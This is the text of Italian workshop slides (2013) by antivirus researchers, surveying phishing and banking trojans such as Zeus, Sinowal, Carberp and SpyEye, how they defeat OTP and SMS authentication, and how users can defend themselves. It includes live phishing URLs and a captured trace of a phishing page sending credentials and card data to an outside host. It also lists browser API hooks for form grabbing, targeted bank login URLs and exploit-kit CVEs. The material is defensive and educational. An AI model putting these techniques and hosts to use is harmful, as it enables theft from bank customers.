Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende
Milano, 23 ottobre 2013
Questo workshop ha carattere tecnico-divulgativo ed ha come obiettivo quello di presentare al pubblico le modalità di attacco di alcune delle più diffuse tipologie di virus-malware progettati per carpire le credenziali di accesso all’on-line banking effettuato dai computer infetti.
Verranno presentate le varie tattiche di aggancio al browser attraverso le quali questi agenti malware sono in grado di rubare le credenziali di accesso agli ignari utenti o dirottare, a loro favore, pagamenti reali effettuati operativamente dall’utente legittimo.
1. Presentazione dei principali agenti malware realizzati con l’obiettivo di trasferire denaro dal conto corrente bancario dell’utente verso conti in paesi stranieri: da Zeus/Zbot, passando per il Sinowal, Gataka e Carberp.
2. I principali metodi di infezione che verranno presentati sono:
- diffusione attraverso e-mail con allegati allodola;
- diffusione attraverso falsi file .PDF;
- diffusione attraverso applet di flash player;
- diffusione attraverso JavaScript nascosti in pagine Web.
3. Presentazione di come avvenga l’infezione sul computer.
4. Illustrazione di come operativamente questi agenti malware siano in grado di bypassare il controllo attraverso chiavette PassKey-OTP, e il codice di verifica inviato via SMS.
5. Come cercare di prevenire l’infezione non solo dalle varianti già note ma anche e soprattutto dalle nuove varianti sconosciute all’antivirus in uso.
6. Conclusione e domande del pubblico. - See more at: http://www.smau.it/milano13/schedules/stato-dellarte-delle-truffe-bancarie-dal-phishing-ai-trojanbanker-come-si-diffonde-e-come-ci-si-difende/#sthash.8SgX7VUf.dpuf
Evoluzione dei malware in ambiente Android: dalle metodologie di infezione al...
Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende
1. Stato dell’arte delle truffe bancarie dal
phishing ai Trojan.Banker, come si
diffonde e come ci si difende
mercoledì 23 ottobre alle ore 13:00
sala Arena Trade - Pad. 1
Relatori: ing. Gianfranco Tonello, Roberto Spagliccia Milano, 23/10/2013
2. Frode informatica
25 Maggio 2012: fonte «Il Mattino di Padova»
http://mattinopadova.gelocal.it/cronaca/2012/05/25/news/frode-informatica-ripulito-il-conto-degli-avvocati-di-padova-1.5154231
Phishing
Trojan
Banker
A xe sta ea
segretaria!
Ogni
riferimento a
persone o fatti
è puramente
casuale
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 2
3. Frodi bancarie: tecniche utilizzate
• Phishing: si intende una tecnica attraverso la
quale un soggetto malintenzionato (chiamato
phisher), riesce a raccogliere dati personali di
accesso, tramite tecniche di ingegneria sociale
che negli anni si sono fatte sempre più raffinate.
• Trojan Banker: malware in grado di rubare le
credenziali di accesso alla propria banca,
modificando le schermate di login dei più diffusi
siti di home banking.
3
Scopo: rubare denaro dal conto corrente
eseguendo bonifici su conti esteri.
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»
4. Frodi bancarie: Phishing
La tecnica è quella di inviare
email relative al proprio
conto corrente, nelle quali
si invita il destinatario ad
accedere immediatamente
al proprio conto, per
verificare i propri dati
oppure per convalidare
vincite o premi che l’istituto
ha deciso di erogare.
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 4
5. Phishing con link fraudolento 1/2
Link:
http://gfsrtdrhqptyszmvs.siamsensationsthai.com/my/gfsrtdrhqptyszmvs.asp?e=<email>
5
http://siamsensationsthai.com
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»
6. Phishing con link fraudolento 2/2
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 6
7. Phishing con allegato 1/3
7
Allegato
Document-poste-it.html
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»
8. Phishing con allegato 2/3
8
Sorgente della pagina: Document-poste-it.html
Nome utente Pluto Paperino
Password paperopoli
Cod. fiscale pltppr73b08g224y
Num. carta 4012 0526 7849 4512
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»
9. Phishing con allegato 3/3
Analisi traffico di rete
[TCP Porta: 80 SEND src 192.168.1.39 -> dst 85.214.122.107 Len=711 Seq=0x37461cb3 Ack=0xa5b319fc ACK Flags=0x18]
POST /ac.php HTTP/1.1
Host: zimmerers.de
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:24.0) Gecko/20100101 Firefox/24.0
[..]
Content-Type: application/x-www-form-urlencoded
Content-Length: 165
utente=Pluto+Paperino&password=paperopoli&codice=pltppr73b08g224y&card1=4012&card2=0526&card3=7849&
card4=4512&mese=10&anno=2015&cvv2=941&btn_login.x=36&btn_login.y=8
[TCP Porta: 80 RECEIVE src 85.214.122.107 -> dst 192.168.1.39 Len=203 Seq=0xa5b319fc Ack=0x37461f7a ACK Flags=0x18]
HTTP/1.1 302 Found
Date: Mon, 07 Oct 2013 13:31:29 GMT
Server: Apache
Location: http://poste.it
[..]
[TCP Porta: 80 SEND src 192.168.1.39 -> dst 62.241.4.35 Len=414 Seq=0x3a538eb3 Ack=0xae867f70 ACK Flags=0x18]
GET / HTTP/1.1
Host: poste.it
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:24.0) Gecko/20100101 Firefox/24.0
[..]
9
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»
10. Phishing: statistiche gennaio – marzo 2013
10
• I siti di phishing sono diminuiti
del 20% dal 4° trim. 2012 al 1°
trim. 2013
• Le segnalazioni di phishing sono
diminuite del 31% da gennaio a
marzo 2013
Siti di Phishing - Marzo 2013
Stati Uniti 53,18% Francia 2,38%
Germania 7,40% Russia 2,34%
UK 4,21% Brasile 2,33%
Canada 4,15% Lituania 1,29%
Turchia 3,81% Olanda 1,26%
Fonte: Phishing Activity Trends Report 1st Quarter 2013 www.apwg.org
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»
11. Autenticazione nell’home banking
• Aut. a senso unico: Username e password statiche con
tastiera fisica/virtuale
• Autenticazione a due fattori: Gridcard e TAN
(Transaction Access Number)
• Autenticazione a due fattori: One Time password (OTP)
• Autenticazione a due fattori: OTP via SMS
• Autenticazione a due fattori: OTP via lettore di Smart
Card (smart tan)
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 11
12. Aut. a senso unico: tastiera fisica
Descrizione La password è una parola segreta o una stringa di caratteri
usata per l’autenticazione. Con statica intendiamo una
password costante, che non cambierà nel tempo, a meno che
non venga aggiornata. La password viene inserita nel campo
«textbox» dell’HTML attraverso la tastiera hardware o virtuale.
Come viene sconfitta I trojan banker possono memorizzare la password attraverso 2
tecniche: keylogging e form grabbing.
Un keylogger può memorizzare ogni tasto premuto dall’utente,
ma non è in grado di catturare la clipboard. L’utente può
memorizzare le sue credenziali in un file e fare un «copia e
incolla» per semplicità o per motivi di sicurezza.
La tecnica del form grabbing consiste nell’intercettare le
richieste API nel browser e memorizzare i dati del web form
prima che siano passate ad internet.
Valutazione dei rischi È vulnerabile alla maggior parte dei Trojan Banker
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 12
13. Aut. a senso unico: tastiera virtuale
Descrizione La tastiera virtuale è stata introdotta in risposta al keylogging e
form grabbing. Consiste nel creare una tastiera virtuale sullo
schermo con una disposizione casuale dei tasti.
Come viene sconfitta I trojan banker possono memorizzare l’area dell’immagine del
tasto premuto oppure registrare un video della sequenza dei
tasti premuti. Questo tipo attacco memorizza le informazioni in
remoto per essere interpretate successivamente.
Valutazione dei rischi È vulnerabile alla maggior parte dei Trojan Banker con
funzionalità screen shot capturing. Non fornisce miglioramenti
in termini di sicurezza rispetto alla textbox.
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 13
14. Autenticazione a due fattori: Gridcard e TAN
(Transaction Access Number)
Descrizione La grid card è una tabella o griglia che contiene di solito 50
codici alfanumerici. Il sistema della grid card può richiedere lo
stesso codice più volte.
La TAN (Transaction Access Number) è similare alla grid card,
contiene una lista di codici.
Come viene sconfitta I trojan banker possono catturare un codice della grid card o
TAN, e di eseguire una disposizione bancaria reiterata fino a
che non viene richiesto il codice catturato.
Valutazione dei rischi È vulnerabile a Trojan Banker. Questa soluzione non migliora la
sicurezza contro keylogger o form grabber.
Inserire il codice
C2 F4 H5
K V M
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 14
15. Autenticazione a due fattori: One Time
password (OTP)
Descrizione L’OTP (one time password) è una password che è valida solo
per una sessione o disposizione. Gli OTP sono basati su
algoritmi crittografici One-way e utilizzano chiavi differenti per
ogni utente. Ogni OTP utilizzato viene cancellato o messo in
una blacklist per non essere utilizzato una seconda volta. Le
OTP sono valide solo per un breve periodo di tempo.
Come viene sconfitta I trojan banker possono catturare l’OTP e bloccare l’inoltro alla
banca, segnalando all’utente un’errata autenticazione all’home
banking. Nel tempo di vita dell’OTP, il trojan banker ha tutte le
informazioni necessarie per eseguire una disposizione.
Valutazione dei rischi È vulnerabile a Trojan Banker «sofisticati». Questa soluzione è
vulnerabile all’HTML injection e ad altre tecniche.
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 15
16. Autenticazione a due fattori: OTP via SMS
Descrizione L’OTP (one time password) viene inviata attraverso un SMS.
L’OTP è associato alla disposizione da eseguire.
Come viene sconfitta La componente mobile del trojan banker può leggere l’SMS
ricevuto e inoltrare il token OTP contenuto ad un server
remoto. In questo modo il trojan banker ha tutte le
informazioni necessarie per completare l’esecuzione della
disposizione.
Valutazione dei rischi È vulnerabile a Trojan Banker «sofisticati» che utilizzano
componenti mobile. Questa soluzione è vulnerabile
nell’intercettazione dell’SMS.
Esempio di SMS:
Fineco – SMS gratuito.
Bonifico 10,59 EUR a CC 00001023456 Pluto Paperino.
Conferma con SMS PIN 217489 o inoltra questo SMS al *******
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 16
17. Autenticazione a due fattori: OTP via
lettore di Smart Card (smart tan)
Descrizione Quando viene eseguita una disposizione, il sito della banca
mostrerà un codice relativo a quella transazione.
Il codice indicato a video dovrà essere inserito nel lettore di
smart card, inserendo prima la carta di credito e il suo relativo
PIN, e poi digitando il codice indicato dalla banca.
In risposta, il lettore restituirà un OTP necessario per concludere
l’operazione dispositiva sul sito.
Come viene sconfitta Il Trojan Banker modifica in modo silente la destinazione della
disposizione autorizzata, grazie ad un attacco man-in-the-middle,
senza che l’utente se ne accorga.
Valutazione dei rischi Molto sicuro, ma è vulnerabile a Trojan Banker che modificano
la destinazione della transazione.
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 17
18. Tecniche dei Trojan Banker 1/2
Trojan Banker
Rubare le
credenziali
bancarie
Modificare la
destinazione della
disposizione
Disposizione
eseguita sul conto
del truffatore
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 18
19. Tecniche dei Trojan Banker 2/2
• Keylogging
• Screen shot capturing
• Browser protected storage
• Redirect verso falsi siti bancari
• VNC privata / Socks Proxy con Back Connect
• Form grabbing (MITB)
• SMS grabbing
• Manipolazione automatica (passiva e attiva)
• Android Banking App repacking
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 19
20. Form grabbing (MITB)
Tutti i browser sono vulnerabili: IE, Firefox,
Google Chrome, Opera, etc.
Hooked API generiche
GetWindowText, TranslateMessage (user32.dll)
send, WSASend (ws2_32.dll)
Internet Explorer
HttpSendRequest (wininet.dll)
HttpSendRequestEx (wininet.dll)
InternetReadFile (wininet.dll)
InternetReadFileEx (wininet.dll)
InternetQueryDataAvailable (wininet.dll)
InternetCloseHandle (wininet.dll)
EncryptMessage (secure32.dll)
1
2
4
3
Firefox
PR_Connect (nspr4.dll)
PR_Write (nspr4.dll)
PR_Read (nspr4.dll)
PR_Close (nspr4.dll)
Nspr4.dll
Malware
dll
injection
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 20
21. Frodi bancarie: Trojan Banker
• Zeus (ZBot – Citadel – ICE IX): file eseguibile che infetta il
pc, metodo di diffusione siti infetti o installato da altri
malware
• Sinowal: rootkit che infetta il Master Boot Record,
metodo di diffusione siti infetti o installato da altri
malware
• Trojan.Win32.Banker: file eseguibile che infetta il
computer, metodo di diffusione via email
• Carberp / SpyEye / Gataka / IBANK : file eseguibile che
infetta il pc, metodo di diffusione siti infetti o installato
da altri malware
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 21
22. Zeus: Il primo trojan banker
Anno 2007
Nome file ntos.exe, oembios.exe, twext.exe, sdra64.exe
Caratteristiche Web fake; Keylogger; Screen shot capture; Browser protected
Storage;
Form grabber: IE/Firefox; Web inject per Internet explorer;
Socks proxy con back connection; VNC; Rubare certificati X.509
Plugin venduti separatamente
Target Banche US, UK, IT, etc
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 22
23. Zeus: banche italiane sotto il mirino
Elenco di alcuni siti di banche italiane trovato all’interno del file di configurazione di Zeus
https://www.gruppocarige.it/grps/vbank/jsp/login.jsp
https://bancopostaonline.poste.it/bpol/bancoposta/formslogin.asp
https://privati.internetbanking.bancaintesa.it/sm/login/IN/box_logi
n.jspe
https://hb.quiubi.it/newSSO/x11logon.htm
https://www.iwbank.it/private/index_pub.jhtml*
https://web.secservizi.it/siteminderagent/forms/login.fcc
https://www.isideonline.it/relaxbanking/sso.Login
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 23
24. Trojan Banker: esempi di web inject 1/2
24
Il trojan Banker modifica (lato client)
la pagina di login della banca,
richiedendo anche la password
dispositiva. Gli autori del malware
possono accedere al conto online
della vittima e eseguire bonifici su
conti esteri alla sua insaputa.
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»
25. Trojan Banker: esempi di web inject 2/2
25
Altro esempio di Web Injection dove
viene richiesta anche la password
dispositiva.
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»
26. Sinowal: plugin per Google Chrome
Anno 2008
Tipologia Infetta il Master Boot Record, installa plugin o moduli per rubare le
credenziali bancarie
Plugin: Content.js; Plugin.dll; msseedir.dll; msdr.dll; lmbd.dll; wsse.dll;
mmdd.dll; iexpgent64.dll (Nov. 2012 – ott. 2013)
Caratteristiche Google Chrome plugin; Form Post tracking
Target Banche NL
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 26
27. Sinowal: plugin per Google Chrome
Wvgimhukax.crx
Manifest.json
Background.html
Content.js
Plugin.dll
Wvgimhukax.crx Content.js Plugin.dll
Tracciatura web
form
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 27
28. Sinowal: default plugin -> content.js
Il «default plugin»
utilizzato da Sinowal è
costituito da 2 moduli:
• Content.js
• Plugin.dll
Il modulo javascript
modifica il metodo POST
per tutti i form caricati
nella pagina web.
In questo modo è in grado
di leggere la password
inserita nel form.
Content.js
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 28
29. Frodi bancarie: Carberp e OTP
VIRUS
1
2
3
4
1. L’utente invia le sue credenziali di accesso alla banca: login, password, Pass-key
Internet banking (OTP = One Time Password).
2. Le credenziale vengono intercettate dal virus, che non le inoltra alla banca, ma le
memorizza. Il virus visualizza un falso messaggio di inserimento errato di
login/password
3. L’utente re-inserisce login/password e un nuovo valore della Pass-key Internet
banking.
4. La Banca conferma la correttezza dei dati inseriti e l’utente accede al suo conto
online
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 29
30. SpyEye: concorrente di Zeus
Anno 2010
Nome file Cleansweep.exe
Caratteristiche Web fake; Keylogger; Screen shot capture;
Form grabber: POST / GET; Web inject;
Socks proxy con back connection; Rubare certificati X.509
Plugin venduti separatamente
Terminare «Zeus»
Target Bank of America, banche UK, US, etc
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 30
31. ZITMO: Zeus In The MObile
Zitmo:
• Symbian
• Android
• Blackberry
Spyeye-In-
The-MObile:
• Symbian
Bonifico eseguito
sul conto del
truffatore
10
SMS Bank:
PIN: nnnn
4
Login:
Password:
Num. di cellulare:
Modello:
Zeus botnet
5
SMS:
Scarica la
seguente app o
certificato di
sicurezza: link
1 2
3
6
7
12
8
9
11
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 31
32. Android Banking App: repacking
Sviluppatore
compilazione
packing
Firmato con
APK
Malicious attacker
decompilazione
Analisi
codice
Modifica del codice
chiave
privata
Google market
o di terze parti
ricompilazione
repacking
Firmato con
chiave privata
APK
Bonifico eseguito
sul conto del
truffatore
1
2
3
4
5 6
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 32
33. Android Fineco App: esempio di repacking
com.fineco.it-1comfinecoitdatamodeladx.smali
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 33
34. Android Fineco App: esempio di repacking
SMS:
Func=json/G_L
OGINuserID=
123password
=abc
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 34
35. Maggiori cause di infezione
• Navigazione su siti non raccomandabili
• Navigazione su siti attendibili ma che sono
stati compromessi (infettati)
• Email con allegati infetti o link su siti infetti
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 35
36. Navigazione su siti non sicuri
• Molti siti poco attendibili includono nelle loro pagine script
(principalmente JavaScript o Flash) che sono in grado di
scaricare ed eseguire codice sul computer di chi lo sta
visitando. Questo può essere tanto più dannoso quanto più
alto è il livello di privilegi con il quale è eseguito il browser
(ad esempio Administrator).
• Exploit kit: Black Hole, Cool Exploit (sfruttano vulnerabilità)
• Molto spesso questo tipo di siti include pubblicità
fraudolente, ingannevoli o banner pubblicitari che, se
cliccati, portano ad altri siti infetti o al download di
software dannoso
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 36
37. Black Hole: Vulnerabilità utilizzate
37
Vulnerabilità Descrizione
CVE-2013-0422 Java
CVE-2012-4681 Java
CVE-2012-1889 Windows
CVE-2012-1723 Java
CVE-2012-0507 Java
CVE-2011-3544 Java
CVE-2011-2110 Adobe Flash Player
CVE-2011-0611 Adobe Flash Player
CVE-2010-3552 Java
CVE-2010-1885 Windows
Vulnerabilità Descrizione
CVE-2010-1423 Java
CVE-2010-0886 Java
CVE-2010-0842 Java
CVE-2010-0840 Java
CVE-2010-0188 Adobe Reader
CVE-2009-1671 Java
CVE-2009-0927 Adobe Reader
CVE-2008-2992 Adobe Reader
CVE-2007-5659 Adobe Reader
CVE-2006-0003 Internet Explorer
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»
38. Virus dell’email
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 38
39. Come mi difendo dai Malware
• Antivirus sempre aggiornato e installato su tutti i pc
della rete
• Aggiornare: Windows, Java, Adobe Reader, Adobe
Flash Player
• Avere buonsenso nell’uso del computer:
• Verificare la tipologia degli allegati che si salvano, una
fattura non sarà di tipo Applicazione
• Verificare la destinazione dei link su cui si clicca
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 39
40. Conclusioni
• Banche e istituti di credito non richiedono mai
la password via email
• Banche e istituti di credito non regalano premi
in denaro, normalmente li chiedono!
• Phishing in calo, ma attenzione!
• Autenticazioni bancarie vulnerabili
• Trojan Banker sofisticati e evoluti
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 40
41. Domande
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 41
42. Autori
• Ing. Gianfranco Tonello (g.tonello@viritpro.com)
• Roberto Spagliccia (r.spagliccia@viritpro.com)
Grazie per l’attenzione
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 42
43. Referenze
• http://www.tgosft.it
• Phishing: un'attività che non passa mai di moda: http://www.tgsoft.it/italy/news_archivio.asp?id=408
• Phishing Activity Trends Report 1st Quarter 2013: http://www.apwg.org
• Home banking a rischio! Trojan.Win32.Banker.CS: la nuova frontiera del phishing:
http://www.tgsoft.it/italy/news_archivio.asp?id=454
• http://www.tomsguide.com/us/factor-authentication-in-online-banking,review-678-5.html
• http://en.wikipedia.org/wiki/Transaction_authentication_number
• https://www.owasp.org/images/e/e4/AppsecEU09_The_Bank_in_The_Browser_Presentation_v1.1.pdf
• ZeuS Banking Trojan Report: http://www.secureworks.com/cyber-threat-intelligence/threats/zeus/
• SpyEye Malware Infection Framework – Virus Bulletin July 2011 (www.virusbtn.com)
• Mobile Banking Vulnerability: Android Repacking Threat – Virus Bulletin May 2012 (www.virusbtn.com)
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 43